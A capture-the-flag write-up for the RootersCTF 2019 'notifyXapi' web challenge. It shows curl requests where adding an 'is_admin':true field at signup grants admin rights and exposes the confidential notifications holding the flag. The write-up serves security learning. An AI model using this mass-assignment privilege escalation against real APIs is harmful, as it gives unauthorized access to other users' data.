Tags: web 

Rating:

# notifyXapi

### Challenge

- **Category**: Web

Reynholm Industries needed a system to issue notifications/messages for their employees. Maurice Moss, coding genius of The IT crowd, was assigned with the task to create one. The basic idea was that upper-level employees can create and view all the notifications. The lower-level employees shouldn't be able to read the confidential upper-level only notifications. Is Maurice really a coding genius ?

Challenge link: <https://notifyxapi.rootersctf.in/>

![](Images/1.png)

### Solution

When I entered in the web application i saw three api methods:

1. Register

```bash
$ curl -X POST "https://notifyxapi.rootersctf.in/api/v1/register/" -H "Content-Type: application/json" \
-d '{"email": "[email protected]", "password": "password"}'
```

2. Login

```bash
$ curl -X POST "https://notifyxapi.rootersctf.in/api/v1/login/" -H "Content-Type: application/json" \
-d '{"email": "[email protected]", "password": "password"}'
```

3. Creating Notifications

```bash
$ export ACCESS="j.w.t"
$ curl -H "Authorization: Bearer $ACCESS" -H "Content-Type: application/json" "https://notifyxapi.rootersctf.in/api/v1/notifications/"
```

When I registered a user I realized that in the response of the request there was a parameter called "**is_admin**" with value **false**.

```bash
$ curl -X POST "https://notifyxapi.rootersctf.in/api/v1/register/" -H "Content-Type: application/json" -d '{"email": "[email protected]", "password": "password"}'

{"created_user":{"id":331,"user":{"email":"[email protected]","is_admin":false,"id":331},"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1NzA4MzA1MTksIm5iZiI6MTU3MDgzMDUxOSwianRpIjoiMmZhYjViZDUtNDU2MC00NzQ2LWFiMTItN2FhM2I4NTk3ZmJjIiwiZXhwIjoxNjAyMzY2NTE5LCJpZGVudGl0eSI6MzMxLCJmcmVzaCI6ZmFsc2UsInR5cGUiOiJhY2Nlc3MifQ.pOtqBY4g-aaQh4VNbUH5T_hakpXCuJHefDI4jYKQsNY"}}

```

So i decided to create a new user and add in the request the parameter "**is_admin**" with value **true**.

The new user has administrator privileges so we can see the notifications of all users and therefore the flag.

```bash
$ curl -X POST "https://notifyxapi.rootersctf.in/api/v1/login/" -H "Content-Type: application/json" -d '{"email": "[email protected]", "password": "password", "is_admin":true}'

{"created_user":{"id":363,"user":{"email":"[email protected]","is_admin":true,"id":363},"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1NzA4NzA5MDYsIm5iZiI6MTU3MDg3MDkwNiwianRpIjoiMGExOTA3MTktMTU2Yi00NzA2LWIwODEtMmE2Y2Q1YTFlY2ZmIiwiZXhwIjoxNjAyNDA2OTA2LCJpZGVudGl0eSI6MzYzLCJmcmVzaCI6ZmFsc2UsInR5cGUiOiJhY2Nlc3MifQ.zl8IJgILpDn2Z-kBUXsr2hk6qxoCpk-xbpqYNyz7JKs"}}

```

To retrieve the flag you only need to request the notifications with the new admin user token.

```bash
$ export ACCESS=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1NzA4NzA5MDYsIm5iZiI6MTU3MDg3MDkwNiwianRpIjoiMGExOTA3MTktMTU2Yi00NzA2LWIwODEtMmE2Y2Q1YTFlY2ZmIiwiZXhwIjoxNjAyNDA2OTA2LCJpZGVudGl0eSI6MzYzLCJmcmVzaCI6ZmFsc2UsInR5cGUiOiJhY2Nlc3MifQ.zl8IJgILpDn2Z-kBUXsr2hk6qxoCpk-xbpqYNyz7JKs

$ curl -H "Authorization: Bearer $ACCESS" -H "Content-Type: application/json" "https://notifyxapi.rootersctf.in/api/v1/notifications/"

[{"body":"rooters{a_big_hard_business_in_a_big_hard_building}ctf","issuer":{"email":"[email protected]","id":1},"id":1,"title":"flag"},{"body":"hey, rosssssss","issuer":{"email":"[email protected]","id":2},"id":2,"title":"The IT Crowd"},{"body":"Jen Barber? Is that the internet?","issuer":{"email":"[email protected]","id":2},"id":3,"title":"The IT Crowd"},{"body":"hey, rosssssss","issuer":{"email":"[email protected]","id":14},"id":4,"title":"The IT Crowd"},{"body":"hey, rosssssss","issuer":{"email":"[email protected]","id":14},"id":5,"title":"The IT Crowd"},{"body":"hey, rosssssss","issuer":{"email":"[email protected]","id":14},"id":6,"title":"The IT Crowd"},{"body":"hey, rosssssss","issuer":{"email":"[email protected]","id":14},"id":7,"title":"'"}]
```

> Flag: rooters{a_big_hard_business_in_a_big_hard_building}ctf

Original writeup (https://github.com/cynops/CTF-Writeups/blob/master/RootersCTF-2019/notifyXapi/README.md).